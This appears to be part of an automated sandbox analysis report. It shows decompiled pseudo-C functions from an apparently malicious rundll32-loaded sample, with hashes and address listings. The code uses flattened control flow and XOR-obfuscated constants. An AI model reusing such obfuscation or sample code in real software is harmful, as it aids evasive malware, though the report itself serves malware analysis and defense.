                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$'$$N
                                                                                                                      • API String ID: 0-2135679241
                                                                                                                      • Opcode ID: 97615591f5f084c9a38ef9eec9de6edeef0eef2f1fdc60eea6539c0a4db16790
                                                                                                                      • Instruction ID: 900eb4579d401c0df48a2b58645d8bdc00065437ed0b686baf0e58e90a9e0d29
                                                                                                                      • Opcode Fuzzy Hash: 97615591f5f084c9a38ef9eec9de6edeef0eef2f1fdc60eea6539c0a4db16790
                                                                                                                      • Instruction Fuzzy Hash: 915123B11083829FC749CF21C58681BFBF4FBD8348F509A1DF5A696220D371DA598F86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0035026B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				void* _t108;
                                                                                                                      				void* _t117;
                                                                                                                      				void* _t124;
                                                                                                                      				void* _t126;
                                                                                                                      				void* _t141;
                                                                                                                      				signed int _t142;
                                                                                                                      				signed int _t143;
                                                                                                                      				signed int* _t146;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t140 = _a4;
                                                                                                                      				_t124 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t108);
                                                                                                                      				_v92 = 0x51c9e1;
                                                                                                                      				_t146 =  &(( &_v96)[5]);
                                                                                                                      				_v92 = _v92 << 4;
                                                                                                                      				_t141 = 0;
                                                                                                                      				_t126 = 0x4bb83f6;
                                                                                                                      				_t142 = 0x49;
                                                                                                                      				_v92 = _v92 * 0x6e;
                                                                                                                      				_v92 = _v92 + 0x829d;
                                                                                                                      				_v92 = _v92 ^ 0x32495c11;
                                                                                                                      				_v68 = 0x73c01f;
                                                                                                                      				_v68 = _v68 + 0x1dcd;
                                                                                                                      				_v68 = _v68 ^ 0x00720d8f;
                                                                                                                      				_v96 = 0xb49fc9;
                                                                                                                      				_v96 = _v96 + 0x43a3;
                                                                                                                      				_v96 = _v96 ^ 0x15acb626;
                                                                                                                      				_v96 = _v96 << 0x10;
                                                                                                                      				_v96 = _v96 ^ 0x554d7300;
                                                                                                                      				_v84 = 0x939dbf;
                                                                                                                      				_v84 = _v84 >> 0xf;
                                                                                                                      				_v84 = _v84 / _t142;
                                                                                                                      				_v84 = _v84 ^ 0x000cd20a;
                                                                                                                      				_v60 = 0xb12a06;
                                                                                                                      				_v60 = _v60 | 0x23fd9b15;
                                                                                                                      				_v60 = _v60 ^ 0x23fc0752;
                                                                                                                      				_v76 = 0x2839ff;
                                                                                                                      				_v76 = _v76 + 0xfffff40d;
                                                                                                                      				_v76 = _v76 << 4;
                                                                                                                      				_v76 = _v76 ^ 0x0280e51a;
                                                                                                                      				_v80 = 0xa0e526;
                                                                                                                      				_v80 = _v80 | 0xbc5e80d8;
                                                                                                                      				_v80 = _v80 >> 7;
                                                                                                                      				_v80 = _v80 ^ 0x017df397;
                                                                                                                      				_v64 = 0xa3347;
                                                                                                                      				_t143 = 0x14;
                                                                                                                      				_v64 = _v64 * 0x36;
                                                                                                                      				_v64 = _v64 ^ 0x02285917;
                                                                                                                      				_v88 = 0x8f496e;
                                                                                                                      				_v88 = _v88 + 0x138c;
                                                                                                                      				_v88 = _v88 + 0x9d7d;
                                                                                                                      				_v88 = _v88 / _t143;
                                                                                                                      				_v88 = _v88 ^ 0x000c7ae1;
                                                                                                                      				_v72 = 0x3c508e;
                                                                                                                      				_v72 = _v72 ^ 0xe86d4278;
                                                                                                                      				_v72 = _v72 | 0x3236ed5f;
                                                                                                                      				_v72 = _v72 ^ 0xfa734a26;
                                                                                                                      				_v52 = 0x119dd9;
                                                                                                                      				_v52 = _v52 ^ 0x40537751;
                                                                                                                      				_v52 = _v52 ^ 0x404ccff2;
                                                                                                                      				_v56 = 0x89ec9d;
                                                                                                                      				_v56 = _v56 ^ 0xd17cb195;
                                                                                                                      				_v56 = _v56 ^ 0xd1fa716b;
                                                                                                                      				do {
                                                                                                                      					while(_t126 != 0x360725a) {
                                                                                                                      						if(_t126 == 0x4bb83f6) {
                                                                                                                      							_t126 = 0x9f53cee;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t126 == 0x6abf560) {
                                                                                                                      								__eflags = E0035B9B1(_v88, _v72, __eflags, _t140 + 4, _v52,  &_v48, _v56);
                                                                                                                      								_t141 =  !=  ? 1 : _t141;
                                                                                                                      							} else {
                                                                                                                      								if(_t126 != 0x9f53cee) {
                                                                                                                      									goto L10;
                                                                                                                      								} else {
                                                                                                                      									E003564C5(_v92, _v68, _v96, _v84, _t124,  &_v48);
                                                                                                                      									_t146 =  &(_t146[4]);
                                                                                                                      									_t126 = 0x360725a;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L13:
                                                                                                                      						return _t141;
                                                                                                                      					}
                                                                                                                      					_t117 = E0034B09F(_v60, _v76,  &_v48, _v80, _t140, _v64);
                                                                                                                      					_t146 =  &(_t146[4]);
                                                                                                                      					__eflags = _t117;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t126 = 0x3e1d0be;
                                                                                                                      						goto L10;
                                                                                                                      					} else {
                                                                                                                      						_t126 = 0x6abf560;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L13;
                                                                                                                      					L10:
                                                                                                                      					__eflags = _t126 - 0x3e1d0be;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L13;
                                                                                                                      			}

                                                                                                                      0x003502cf
                                                                                                                      0x003502d7
                                                                                                                      0x003502df
                                                                                                                      0x003502e7
                                                                                                                      0x003502ef
                                                                                                                      0x003502f4
                                                                                                                      0x003502fc
                                                                                                                      0x00350304
                                                                                                                      0x00350311
                                                                                                                      0x00350315
                                                                                                                      0x0035031d
                                                                                                                      0x00350325
                                                                                                                      0x0035032d
                                                                                                                      0x00350335
                                                                                                                      0x0035033d
                                                                                                                      0x00350345
                                                                                                                      0x0035034a
                                                                                                                      0x00350352
                                                                                                                      0x0035035a
                                                                                                                      0x00350362
                                                                                                                      0x00350367
                                                                                                                      0x0035036f
                                                                                                                      0x0035037c
                                                                                                                      0x0035037d
                                                                                                                      0x00350381
                                                                                                                      0x00350389
                                                                                                                      0x00350391
                                                                                                                      0x00350399
                                                                                                                      0x003503ac
                                                                                                                      0x003503b0
                                                                                                                      0x003503b8
                                                                                                                      0x003503c0
                                                                                                                      0x003503c8
                                                                                                                      0x003503d0
                                                                                                                      0x003503d8
                                                                                                                      0x003503e0
                                                                                                                      0x003503e8
                                                                                                                      0x003503f0
                                                                                                                      0x003503f8
                                                                                                                      0x00350400
                                                                                                                      0x00350408
                                                                                                                      0x00350408
                                                                                                                      0x00350416
                                                                                                                      0x00350449
                                                                                                                      0x00000000
                                                                                                                      0x00350418
                                                                                                                      0x0035041a
                                                                                                                      0x003504a9
                                                                                                                      0x003504ab
                                                                                                                      0x0035041c
                                                                                                                      0x00350422
                                                                                                                      0x00000000
                                                                                                                      0x00350424
                                                                                                                      0x0035043a
                                                                                                                      0x0035043f
                                                                                                                      0x00350442
                                                                                                                      0x00000000
                                                                                                                      0x00350442
                                                                                                                      0x00350422
                                                                                                                      0x0035041a
                                                                                                                      0x003504af
                                                                                                                      0x003504b7
                                                                                                                      0x003504b7
                                                                                                                      0x00350466
                                                                                                                      0x0035046b
                                                                                                                      0x0035046e
                                                                                                                      0x00350470
                                                                                                                      0x00350476
                                                                                                                      0x00000000
                                                                                                                      0x00350472
                                                                                                                      0x00350472
                                                                                                                      0x00000000
                                                                                                                      0x00350472
                                                                                                                      0x00000000
                                                                                                                      0x0035047b
                                                                                                                      0x0035047b
                                                                                                                      0x0035047b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: G3$QwS@$_62
                                                                                                                      • API String ID: 0-451131340
                                                                                                                      • Opcode ID: 3902cee3783e2c7279a12e7e0d5481830c8a8355854c33fa136e91049aa61468
                                                                                                                      • Instruction ID: 0ace65bf5d54c3c3fe9e2933c6abbde43e68770f5ce375c6ec533792e055e53c
                                                                                                                      • Opcode Fuzzy Hash: 3902cee3783e2c7279a12e7e0d5481830c8a8355854c33fa136e91049aa61468
                                                                                                                      • Instruction Fuzzy Hash: B25167B11083449FD348DF21C58A82FFBE5FBC4758F505A1DFA96A6261D3B1DA488B83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0034C850(intOrPtr* __ecx) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				intOrPtr _v68;
                                                                                                                      				char _v328;
                                                                                                                      				char _t126;
                                                                                                                      				void* _t128;
                                                                                                                      				signed int _t129;
                                                                                                                      				void* _t133;
                                                                                                                      				signed int _t135;
                                                                                                                      				signed int _t136;
                                                                                                                      				char* _t137;
                                                                                                                      				intOrPtr* _t154;
                                                                                                                      
                                                                                                                      				_v64 = _v64 & 0x00000000;
                                                                                                                      				_v60 = _v60 & 0x00000000;
                                                                                                                      				_v68 = 0xeb7817;
                                                                                                                      				_v44 = 0x4dbb17;
                                                                                                                      				_v44 = _v44 >> 3;
                                                                                                                      				_v44 = _v44 ^ 0x000af917;
                                                                                                                      				_v12 = 0xca90c;
                                                                                                                      				_v12 = _v12 >> 0xf;
                                                                                                                      				_v12 = _v12 >> 0xe;
                                                                                                                      				_v12 = _v12 | 0x67e1d035;
                                                                                                                      				_v12 = _v12 ^ 0x67ebacbe;
                                                                                                                      				_v32 = 0xdd0ad5;
                                                                                                                      				_v32 = _v32 >> 6;
                                                                                                                      				_v32 = _v32 >> 0xc;
                                                                                                                      				_v32 = _v32 ^ 0x00040440;
                                                                                                                      				_v16 = 0xaefc2a;
                                                                                                                      				_v16 = _v16 ^ 0x05a88ae0;
                                                                                                                      				_t154 = __ecx;
                                                                                                                      				_t135 = 0x4a;
                                                                                                                      				_v16 = _v16 / _t135;
                                                                                                                      				_v16 = _v16 | 0x6472a2d9;
                                                                                                                      				_v16 = _v16 ^ 0x647c73c3;
                                                                                                                      				_v8 = 0x7aea22;
                                                                                                                      				_t136 = 0x5f;
                                                                                                                      				_v8 = _v8 * 0x1d;
                                                                                                                      				_v8 = _v8 >> 0xa;
                                                                                                                      				_v8 = _v8 >> 7;
                                                                                                                      				_v8 = _v8 ^ 0x0003680c;
                                                                                                                      				_v28 = 0xd7a14b;
                                                                                                                      				_v28 = _v28 >> 1;
                                                                                                                      				_v28 = _v28 | 0x0e275eed;
                                                                                                                      				_v28 = _v28 ^ 0x0e6be1b9;
                                                                                                                      				_v56 = 0x693eb0;
                                                                                                                      				_t137 =  &_v328;
                                                                                                                      				_v56 = _v56 / _t136;
                                                                                                                      				_v56 = _v56 ^ 0x00052716;
                                                                                                                      				_v52 = 0x6599ea;
                                                                                                                      				_v52 = _v52 << 8;
                                                                                                                      				_v52 = _v52 ^ 0x659cef3f;
                                                                                                                      				_v36 = 0xaf3092;
                                                                                                                      				_v36 = _v36 + 0xffffd3bf;
                                                                                                                      				_v36 = _v36 ^ 0x419856f6;
                                                                                                                      				_v36 = _v36 ^ 0x413f6f4c;
                                                                                                                      				_v40 = 0x56314e;
                                                                                                                      				_v40 = _v40 ^ 0x0d0339a4;
                                                                                                                      				_v40 = _v40 >> 5;
                                                                                                                      				_v40 = _v40 ^ 0x0068e9be;
                                                                                                                      				_v20 = 0xd689b7;
                                                                                                                      				_v20 = _v20 >> 1;
                                                                                                                      				_v20 = _v20 + 0x3668;
                                                                                                                      				_v20 = _v20 ^ 0x006dcd8c;
                                                                                                                      				_v24 = 0x36edf6;
                                                                                                                      				_v24 = _v24 + 0x231d;
                                                                                                                      				_v24 = _v24 ^ 0xb40b6ffd;
                                                                                                                      				_v24 = _v24 ^ 0xb434c03a;
                                                                                                                      				_v48 = 0x867594;
                                                                                                                      				_v48 = _v48 * 0x3a;
                                                                                                                      				_v48 = _v48 ^ 0x1e7cd6f5;
                                                                                                                      				while(1) {
                                                                                                                      					_t126 =  *_t154;
                                                                                                                      					if(_t126 == 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					if(_t126 == 0x2e) {
                                                                                                                      						 *_t137 = 0;
                                                                                                                      					} else {
                                                                                                                      						 *_t137 = _t126;
                                                                                                                      						_t137 = _t137 + 1;
                                                                                                                      						_t154 = _t154 + 1;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					L6:
                                                                                                                      					_t128 = E003559B7(_v44, _v12,  &_v328, _v32);
                                                                                                                      					_t155 = _t128;
                                                                                                                      					if(_t128 != 0) {
                                                                                                                      						L8:
                                                                                                                      						_t129 = E0035FE5E(_v56, _t154 + 1, _v52, _v36);
                                                                                                                      						_push(_v48);
                                                                                                                      						_push(_v24);
                                                                                                                      						_push(_v20);
                                                                                                                      						_push(_v40);
                                                                                                                      						return E0034F2C1(_t155, _t129 ^ 0x3e95e426);
                                                                                                                      					}
                                                                                                                      					_t133 = E0035F949(_v16, _v8,  &_v328, _v28);
                                                                                                                      					_t155 = _t133;
                                                                                                                      					if(_t133 != 0) {
                                                                                                                      						goto L8;
                                                                                                                      					}
                                                                                                                      					return _t133;
                                                                                                                      				}
                                                                                                                      				goto L6;
                                                                                                                      			}





























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "z$Lo?A$N1V
                                                                                                                      • API String ID: 0-1513724126
                                                                                                                      • Opcode ID: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction ID: 2f224b6fd2be6839c59b1b6c09314086438347dcdca42158eccd155a983bc063
                                                                                                                      • Opcode Fuzzy Hash: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction Fuzzy Hash: AD514431C0121EEBCF4ACFA5D94A6EEFBB1FB44318F208159D511BA260D7B51A09CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 68%
                                                                                                                      			E0034B821() {
                                                                                                                      				signed int _v4;
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				intOrPtr _t108;
                                                                                                                      				intOrPtr _t111;
                                                                                                                      				signed int _t113;
                                                                                                                      				signed int _t114;
                                                                                                                      				signed int _t115;
                                                                                                                      				intOrPtr* _t116;
                                                                                                                      				void* _t117;
                                                                                                                      				void* _t129;
                                                                                                                      				signed int* _t131;
                                                                                                                      
                                                                                                                      				_t131 =  &_v40;
                                                                                                                      				_v8 = 0x113b84;
                                                                                                                      				_v8 = _v8 >> 5;
                                                                                                                      				_v8 = _v8 ^ 0x00044f92;
                                                                                                                      				_v36 = 0x188bc5;
                                                                                                                      				_v36 = _v36 * 0x48;
                                                                                                                      				_v36 = _v36 + 0xffff17a0;
                                                                                                                      				_t129 = 0x184d0e0;
                                                                                                                      				_v36 = _v36 << 0xf;
                                                                                                                      				_v36 = _v36 ^ 0x33821a89;
                                                                                                                      				_v28 = 0x501440;
                                                                                                                      				_v28 = _v28 + 0x91aa;
                                                                                                                      				_v28 = _v28 ^ 0x04b9c112;
                                                                                                                      				_v28 = _v28 ^ 0x04ea9889;
                                                                                                                      				_v32 = 0xb3d9a7;
                                                                                                                      				_t113 = 0x1d;
                                                                                                                      				_v32 = _v32 * 0x13;
                                                                                                                      				_v32 = _v32 * 0x6a;
                                                                                                                      				_v32 = _v32 ^ 0x86e7717c;
                                                                                                                      				_v40 = 0x7a3277;
                                                                                                                      				_t30 =  &_v40; // 0x7a3277
                                                                                                                      				_v40 =  *_t30 * 0x26;
                                                                                                                      				_v40 = _v40 + 0x92c7;
                                                                                                                      				_v40 = _v40 << 6;
                                                                                                                      				_v40 = _v40 ^ 0x89042107;
                                                                                                                      				_v12 = 0xe6e512;
                                                                                                                      				_v12 = _v12 / _t113;
                                                                                                                      				_v12 = _v12 ^ 0x0000e0e8;
                                                                                                                      				_v16 = 0xf852d4;
                                                                                                                      				_t114 = 0x7e;
                                                                                                                      				_v16 = _v16 / _t114;
                                                                                                                      				_v16 = _v16 ^ 0x2a7b237e;
                                                                                                                      				_v16 = _v16 ^ 0x2a71b8af;
                                                                                                                      				_v20 = 0xa37a15;
                                                                                                                      				_v20 = _v20 + 0xffff21a5;
                                                                                                                      				_v20 = _v20 >> 0xb;
                                                                                                                      				_v20 = _v20 ^ 0x000b71fe;
                                                                                                                      				_v4 = 0x3aba4b;
                                                                                                                      				_v4 = _v4 ^ 0x2eee7843;
                                                                                                                      				_v4 = _v4 ^ 0x2ed9fad0;
                                                                                                                      				_v24 = 0x4dcf39;
                                                                                                                      				_t115 = 0x4a;
                                                                                                                      				_v24 = _v24 / _t115;
                                                                                                                      				_v24 = _v24 << 0xe;
                                                                                                                      				_v24 = _v24 ^ 0x434ce119;
                                                                                                                      				_t116 =  *0x365208; // 0x0
                                                                                                                      				do {
                                                                                                                      					while(_t129 != 0x184d0e0) {
                                                                                                                      						if(_t129 == 0x7e35d81) {
                                                                                                                      							_t108 = E00354EFF(E003599AA, _v16, _t116, _t116, _v20, _v4, _t116, _v24, 0);
                                                                                                                      							_t116 =  *0x365208; // 0x0
                                                                                                                      							 *((intOrPtr*)(_t116 + 0x14)) = _t108;
                                                                                                                      						} else {
                                                                                                                      							if(_t129 != 0xb90d6f1) {
                                                                                                                      								goto L6;
                                                                                                                      							} else {
                                                                                                                      								_push(_v12);
                                                                                                                      								_push(_v40);
                                                                                                                      								_t111 = E003511FC(_v32);
                                                                                                                      								_t116 =  *0x365208; // 0x0
                                                                                                                      								_t131 = _t131 - 0xc + 0x14;
                                                                                                                      								_t129 = 0x7e35d81;
                                                                                                                      								 *_t116 = _t111;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L9:
                                                                                                                      						return 0 | _t116 != 0x00000000;
                                                                                                                      					}
                                                                                                                      					_push(_t116);
                                                                                                                      					_push(_t116);
                                                                                                                      					_t117 = 0x18;
                                                                                                                      					_t116 = E00353512(_t117);
                                                                                                                      					_t129 = 0xb90d6f1;
                                                                                                                      					 *0x365208 = _t116;
                                                                                                                      					L6:
                                                                                                                      				} while (_t129 != 0x93e05db);
                                                                                                                      				goto L9;
                                                                                                                      			}






















                                                                                                                      0x0034b953
                                                                                                                      0x0034b95b
                                                                                                                      0x0034b967
                                                                                                                      0x0034b96a
                                                                                                                      0x0034b96e
                                                                                                                      0x0034b973
                                                                                                                      0x0034b97b
                                                                                                                      0x0034b981
                                                                                                                      0x0034b981
                                                                                                                      0x0034b987
                                                                                                                      0x0034b9f6
                                                                                                                      0x0034b9fb
                                                                                                                      0x0034ba04
                                                                                                                      0x0034b989
                                                                                                                      0x0034b98b
                                                                                                                      0x00000000
                                                                                                                      0x0034b98d
                                                                                                                      0x0034b98d
                                                                                                                      0x0034b991
                                                                                                                      0x0034b99c
                                                                                                                      0x0034b9a1
                                                                                                                      0x0034b9a7
                                                                                                                      0x0034b9aa
                                                                                                                      0x0034b9ac
                                                                                                                      0x00000000
                                                                                                                      0x0034b9ac
                                                                                                                      0x0034b98b
                                                                                                                      0x0034ba08
                                                                                                                      0x0034ba15
                                                                                                                      0x0034ba15
                                                                                                                      0x0034b9bc
                                                                                                                      0x0034b9bd
                                                                                                                      0x0034b9c0
                                                                                                                      0x0034b9c8
                                                                                                                      0x0034b9ca
                                                                                                                      0x0034b9cc
                                                                                                                      0x0034b9d2
                                                                                                                      0x0034b9d2
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Cx.$w2z$~#{*
                                                                                                                      • API String ID: 0-3781971293
                                                                                                                      • Opcode ID: 89c6ce039be4841321af886fe763bd97d904570206a5f6037281494c4f3ffd6a
                                                                                                                      • Instruction ID: 737b0b9721596b136c82894bc0f4b1cfc6ac0a4b7160fa3b6928a517617405cc
                                                                                                                      • Opcode Fuzzy Hash: 89c6ce039be4841321af886fe763bd97d904570206a5f6037281494c4f3ffd6a
                                                                                                                      • Instruction Fuzzy Hash: 975189715083419FC309DF29E88A80BFBE5FBC8758F008A1DF595AA260D371DA498F97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0034AE9A() {
                                                                                                                      				signed char _v2;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				char _v284;
                                                                                                                      				signed short _v320;
                                                                                                                      				intOrPtr _v324;
                                                                                                                      				intOrPtr _v328;
                                                                                                                      				intOrPtr _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				void* _t93;
                                                                                                                      				signed int _t105;
                                                                                                                      				signed int _t106;
                                                                                                                      				signed int _t107;
                                                                                                                      				intOrPtr _t109;
                                                                                                                      				signed int* _t111;
                                                                                                                      
                                                                                                                      				_t111 =  &_v364;
                                                                                                                      				_v332 = 0xbc8cfe;
                                                                                                                      				_t109 = 0;
                                                                                                                      				_t93 = 0x544b857;
                                                                                                                      				_v328 = 0;
                                                                                                                      				_v324 = 0;
                                                                                                                      				_v348 = 0xa18708;
                                                                                                                      				_v348 = _v348 | 0xdf6aec5f;
                                                                                                                      				_v348 = _v348 ^ 0xdfe83fdc;
                                                                                                                      				_v356 = 0xddc275;
                                                                                                                      				_v356 = _v356 + 0xef66;
                                                                                                                      				_t105 = 0x44;
                                                                                                                      				_v356 = _v356 / _t105;
                                                                                                                      				_v356 = _v356 ^ 0x000c07d0;
                                                                                                                      				_v360 = 0xb33a69;
                                                                                                                      				_v360 = _v360 + 0x311b;
                                                                                                                      				_v360 = _v360 + 0xffff8b8d;
                                                                                                                      				_v360 = _v360 ^ 0x00b7daa7;
                                                                                                                      				_v364 = 0x70c027;
                                                                                                                      				_t106 = 0x45;
                                                                                                                      				_v364 = _v364 / _t106;
                                                                                                                      				_v364 = _v364 >> 3;
                                                                                                                      				_t107 = 0x76;
                                                                                                                      				_v364 = _v364 / _t107;
                                                                                                                      				_v364 = _v364 ^ 0x00047190;
                                                                                                                      				_v340 = 0xefeeea;
                                                                                                                      				_v340 = _v340 >> 9;
                                                                                                                      				_v340 = _v340 ^ 0x00027f77;
                                                                                                                      				_v352 = 0xde5c51;
                                                                                                                      				_v352 = _v352 + 0xffff1c5e;
                                                                                                                      				_v352 = _v352 ^ 0x00dc38de;
                                                                                                                      				_v344 = 0x59a1b5;
                                                                                                                      				_v344 = _v344 + 0xf1eb;
                                                                                                                      				_v344 = _v344 ^ 0x005dc95d;
                                                                                                                      				_v336 = 0x74ce3f;
                                                                                                                      				_v336 = _v336 + 0xffffdac0;
                                                                                                                      				_v336 = _v336 ^ 0x0079bed4;
                                                                                                                      				do {
                                                                                                                      					while(_t93 != 0x136692) {
                                                                                                                      						if(_t93 == 0x147bc0f) {
                                                                                                                      							_t93 = 0xf967eb2;
                                                                                                                      							_t109 = _t109 + _v276 * 0x64;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t93 == 0x544b857) {
                                                                                                                      								_t93 = 0x136692;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t93 == 0x6e5561d) {
                                                                                                                      									_t93 = 0xde10965;
                                                                                                                      									_t109 = _t109 + (_v2 & 0x000000ff) * 0x186a0;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t93 == 0x9c7e626) {
                                                                                                                      										E00343D8A(_v340,  &_v320, _v352, _v344, _v336);
                                                                                                                      										_t111 =  &(_t111[3]);
                                                                                                                      										_t93 = 0x6e5561d;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t93 == 0xde10965) {
                                                                                                                      											_t93 = 0x147bc0f;
                                                                                                                      											_t109 = _t109 + _v280 * 0x3e8;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t93 != 0xf967eb2) {
                                                                                                                      												goto L16;
                                                                                                                      											} else {
                                                                                                                      												_t109 = _t109 + (_v320 & 0x0000ffff);
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L9:
                                                                                                                      						return _t109;
                                                                                                                      					}
                                                                                                                      					_v284 = 0x11c;
                                                                                                                      					E00355A5C( &_v284, _v348, _v356, _v360, _v364);
                                                                                                                      					_t111 =  &(_t111[3]);
                                                                                                                      					_t93 = 0x9c7e626;
                                                                                                                      					L16:
                                                                                                                      				} while (_t93 != 0xf3c44c2);
                                                                                                                      				goto L9;
                                                                                                                      			}

























                                                                                                                      0x00000000
                                                                                                                      0x0034aff1
                                                                                                                      0x0034aff6
                                                                                                                      0x0034aff6
                                                                                                                      0x0034afeb
                                                                                                                      0x0034afe7
                                                                                                                      0x0034afdf
                                                                                                                      0x0034afd7
                                                                                                                      0x0034afcf
                                                                                                                      0x0034aff9
                                                                                                                      0x0034b004
                                                                                                                      0x0034b004
                                                                                                                      0x0034b06d
                                                                                                                      0x0034b081
                                                                                                                      0x0034b086
                                                                                                                      0x0034b089
                                                                                                                      0x0034b08e
                                                                                                                      0x0034b08e
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: e$e$f
                                                                                                                      • API String ID: 0-1877623186
                                                                                                                      • Opcode ID: 3bc59c3c401371c9cdb65951a26b58042382158b88ab3837599062e84b37cfbd
                                                                                                                      • Instruction ID: faa15daccf0cf597caf2021bd9d4e24205151455e6a0ef42e528f3a41c45fb4c
                                                                                                                      • Opcode Fuzzy Hash: 3bc59c3c401371c9cdb65951a26b58042382158b88ab3837599062e84b37cfbd
                                                                                                                      • Instruction Fuzzy Hash: B441A8B16083028BC719CE15D99546FFAE1EBD4708F148A2EF59A5A260D3B4DA0DCF87
                                                                                                                      Uniqueness

